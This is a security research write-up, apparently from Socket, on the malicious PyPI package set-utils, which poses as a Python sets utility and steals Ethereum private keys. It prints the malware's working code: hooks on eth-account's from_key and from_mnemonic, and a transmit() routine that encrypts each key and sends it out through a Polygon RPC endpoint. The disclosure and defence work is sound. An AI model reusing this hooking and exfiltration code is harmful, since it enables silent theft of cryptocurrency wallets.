New PyPI Malware ‘set-utils’ Exfiltrates Ethereum Private Keys Through Blockchain Transactions

The Socket Research Team has discovered a malicious PyPI package, set-utils, designed to steal Ethereum private keys by exploiting commonly used account creation functions. Disguised as a simple utility for Python sets, the package mimics widely used libraries like python-utils (712M+ downloads) and utils (23.5M+ downloads). This deception tricks unsuspecting developers into installing the compromised package, granting attackers unauthorized access to Ethereum wallets.

Since January 29, 2025, set-utils has been downloaded more than +1,000 times, putting Ethereum users and developers at risk. The package specifically targets those working with blockchain technology, particularly developers using Python-based wallet management libraries such as eth-account. By intercepting Ethereum account creation, the package exfiltrates private keys via the blockchain by abusing https://rpc-amoy.polygon.technology/ as a Command and Control (C2) server. This allows attackers to extract stolen credentials in a stealthy manner.

Potential Targets#

This attack primarily targets Ethereum developers and organizations working with Python-based blockchain applications, including the following:

• Blockchain developers utilizing eth-account for wallet creation and management.
• DeFi (Decentralized Finance) projects relying on Python scripts for account generation.
• Crypto exchanges and Web3 applications integrating Ethereum transactions.
• Individuals managing personal Ethereum wallets using Python automation.

Anyone who has installed the package risks exposing their private keys to attackers, potentially leading to significant financial losses.

Impact of the Attack#

The consequences of this attack include:

• Silent theft of Ethereum private keys: The attack hooks into standard wallet creation methods, making it difficult to detect.
• Hardcoded attacker-controlled RSA public key: The private key is encrypted before being transmitted, concealing the data from basic monitoring.
• Abuse of Polygon RPC (rpc-amoy.polygon.technology/) as a C2 channel: Instead of using traditional network exfiltration, stolen data is hidden within blockchain transactions, making detection much harder.
• Permanent compromise: Even if set-utils is uninstalled, any Ethereum wallets created while it was active are already exposed and compromised.

Step-by-Step Analysis of Malicious Code#

Stage 1: Embedding the Attacker’s RSA Public Key & Ethereum Account

The first part of the malicious script defines an attacker-controlled RSA public key and Ethereum wallet address, which are used for encrypting and transmitting the stolen private keys.

pycrypto_pubkey = b"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoE/n0a0nNk3hGlDv+ypQ\n8Vk/xHpjYD6LpFYLmBBv4fg5ScckQwDweOKTLmN12cC2EWlpIiiS6u3Zqdph6L34\nO/ec1v9E+4yk02d0ttSwNDMaUzaGXaZaHv1N8ln+KYFaQjx+HvGlEDpDAxEElowB\nmsYv9ZOX/AUFvmL9Ug6ZqcN4/7ISV45c20dukWsH46qbVPyIh3ppOXdtAG13Bqxo\nDN+uKvD7XaC1DOWepWEXYKyIIre5gR0U5Un0v44YWQaQIPruWrYpKl8acKrAuHiQ\nUZdGKxmJlRyUUAAEVhYodW3kw0KAWZgcUDYkfJg2eCEXV4rx/CtTSEvPmPeU7FV9\nIQIDAQAB\n-----END PUBLIC KEY-----"
cipher = PKCS1_OAEP.new(RSA.import_key(pycrypto_pubkey))

sender_account = Account.from_key(
    "0xa3a1d8ee43adc1024b2407b2230e018bd1752ebc819b8abe873b8a3aa5acaee3"
)

Stage 2: Exfiltrating Private Keys via Polygon RPC (C2 Server)

The core function responsible for exfiltrating stolen private keys is transmit(). It encrypts the private key and sends it within an Ethereum transaction via the Polygon RPC endpoint rpc-amoy.polygon.technology/.

def transmit(acct):
    try:
        from web3 import Web3
        from hexbytes import HexBytes

        web3 = Web3(Web3.HTTPProvider("https://rpc-amoy.polygon.technology/"))

        transaction = {
            "value": 0,
            "nonce": web3.eth.get_transaction_count(sender_account.address),
            "gas": 60000,
            "gasPrice": web3.eth.gas_price,
            "chainId": web3.eth.chain_id,
            "data": cipher.encrypt(acct.key),
        }

        (
            v,
            r,
            s,
            encoded_transaction,
        ) = sign_transaction_dict(acct._key_obj, transaction, blobs=None)

        tx_hash = web3.eth.send_raw_transaction(HexBytes(encoded_transaction))
    except:
        pass

Stage 3: Modifying Ethereum Account Creation Functions

The package silently modifies standard Ethereum wallet creation functions, wrapping from_key() and from_mnemonic() to exfiltrate credentials in the background.

def augment_func(func):
    @wraps(func)
    def wrapper(self, *args, **kwargs):
        acct = func(self, *args, **kwargs)
        threading.Thread(target=transmit, args=(acct,), daemon=True).start()
        return acct

    return wrapper

This ensures that even when a user successfully creates an Ethereum account, their private key is stolen and transmitted to the attacker. The malicious function runs in a background thread, making detection even more difficult.

Mitigating the Risk#

To mitigate these risks, developers and organizations must take proactive measures to secure their software supply chains. Regular dependency audits and automated scanning tools should be employed to detect anomalous or malicious behaviors in third-party packages before they are integrated into production environments.

• Socket’s free GitHub app enables real-time monitoring of pull requests, flagging suspicious or malicious packages before they are merged.
• Running the Socket CLI during installations or builds adds another layer of defense by identifying anomalies in open source dependencies before they reach production.
• Using the Socket browser extension provides on-the-fly protection by analyzing browsing activity and alerting users to potential threats before they download or interact with malicious content.

By integrating these security measures into development workflows, organizations can significantly reduce the likelihood of supply chain attacks. We have reported this malicious package to the PyPI team, and it was promptly removed to prevent further attacks.

Socket Research Team

Dhanesh Dodia

Sambarathi Sai

Dwijay Chintakunta